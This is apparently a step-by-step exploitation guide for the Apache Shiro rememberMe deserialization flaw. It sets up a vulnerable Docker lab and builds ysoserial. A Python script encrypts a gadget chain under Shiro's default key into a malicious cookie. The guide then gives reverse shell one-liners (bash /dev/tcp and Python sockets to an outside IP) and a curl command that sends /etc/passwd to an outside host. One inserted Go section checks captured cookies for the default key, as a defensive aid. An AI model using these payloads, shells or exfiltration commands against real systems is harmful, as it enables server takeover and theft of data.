Apache Shiro Deserialization Remote Code Execution: Reproduction and Environment Setup

docker:

docker pull medicean/vulapps:s_shiro_1

docker run -d -p 5001:8080 medicean/vulapps:s_shiro_1


Generate the payload:

yum install maven -y

git clone https://github.com/frohoff/ysoserial.git

cd ysoserial/

mvn package -DskipTests

cp target/ysoserial-0.0.6-SNAPSHOT-all.jar /tmp

yum install python3-devel

pip3 install pycryptodome

shiro.py

# pip3 install pycryptodome  (provides the Crypto package; the old pycrypto is unmaintained)
import sys
import base64
import uuid
import subprocess
from Crypto.Cipher import AES

# The ysoserial jar built above and copied to /tmp in the previous step.
YSOSERIAL_JAR = '/tmp/ysoserial-0.0.6-SNAPSHOT-all.jar'

def encode_rememberme(command):
    # ysoserial writes the serialized CommonsCollections2 gadget chain to stdout.
    popen = subprocess.Popen(['java', '-jar', YSOSERIAL_JAR, 'CommonsCollections2', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    # PKCS#7 padding up to a whole number of AES blocks.
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="   # Shiro's shipped default rememberMe key (base64)
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes            # random 16-byte IV, prepended to the ciphertext
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    # Cookie value = base64(iv || AES-CBC ciphertext), the layout Shiro's rememberMe expects.
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])
    with open("/tmp/payload.cookie", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)

python3 shiro.py "ping riuvkb.dnslog.cn"
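As an added defender-side example (my own code, not part of the original post or of shiro.py): given a captured rememberMe cookie value, this Go program decrypts it under the same default key quoted above and checks whether the result is a Java serialization stream (header bytes AC ED 00 05), which tells you the server is still running with Shiro's shipped key. The function names and the fixed-IV fixture produced by SampleCookie are my own constructions; only the key and the cookie layout come from the page.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"fmt"
)

const DefaultKeyB64 = "kPH+bIxk5D2deZiIxcaaaA==" // Shiro's shipped default rememberMe key, as used in shiro.py
var javaSerialMagic = []byte{0xac, 0xed, 0x00, 0x05} // Java serialization STREAM_MAGIC + STREAM_VERSION

// DecryptRememberMe reverses the layout shiro.py builds: base64(iv[16] || AES-128-CBC(PKCS#7(payload))).
func DecryptRememberMe(cookie string, key []byte) ([]byte, error) {
	raw, err := base64.StdEncoding.DecodeString(cookie)
	if err != nil || len(key) != 16 || len(raw) < 2*aes.BlockSize || len(raw)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("need a 16-byte key and base64(iv[16] || whole AES blocks)")
	}
	block, _ := aes.NewCipher(key) // cannot fail: key length checked above
	pt := make([]byte, len(raw)-aes.BlockSize)
	cipher.NewCBCDecrypter(block, raw[:aes.BlockSize]).CryptBlocks(pt, raw[aes.BlockSize:])
	pad := int(pt[len(pt)-1]) // PKCS#7: last byte is the pad length and every pad byte equals it
	if pad < 1 || pad > aes.BlockSize || !bytes.Equal(pt[len(pt)-pad:], bytes.Repeat([]byte{byte(pad)}, pad)) {
		return nil, fmt.Errorf("bad PKCS#7 padding: wrong key or tampered cookie")
	}
	return pt[:len(pt)-pad], nil
}

// UsesDefaultKey reports whether a captured rememberMe value decrypts under the default key to a Java serialization stream.
func UsesDefaultKey(cookie string) bool {
	key, _ := base64.StdEncoding.DecodeString(DefaultKeyB64)
	pt, err := DecryptRememberMe(cookie, key)
	return err == nil && bytes.HasPrefix(pt, javaSerialMagic)
}

// SampleCookie is a constructed fixture, not a gadget chain: the 4-byte header padded to one block, then encrypted.
func SampleCookie(key, iv []byte) string {
	pt := append(append([]byte{}, javaSerialMagic...), bytes.Repeat([]byte{12}, 12)...)
	block, _ := aes.NewCipher(key)
	ct := make([]byte, len(pt))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, pt)
	return base64.StdEncoding.EncodeToString(append(append([]byte{}, iv...), ct...))
}

func main() {
	key, _ := base64.StdEncoding.DecodeString(DefaultKeyB64)
	iv := bytes.Repeat([]byte{0x42}, aes.BlockSize) // fixed IV so the fixture is reproducible
	fmt.Println(UsesDefaultKey(SampleCookie(key, iv))) // true: a cookie built under the default key is recognised
}
```

A cookie issued by a server configured with its own key fails the padding or header check and is reported as false, so the same routine can run over captured cookies to confirm the key has actually been rotated.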


Reverse shell with nc

Listener

nc -lvvp 9999

Connect back

bash -i >& /dev/tcp/111.111.111.111/9999 0>&1

Or

python3 -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('111.111.111.111',9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"


Reading the command output from the server's logs:

curl xxxx.cn/$(cat /etc/passwd |xargs| sed 's/ //g')

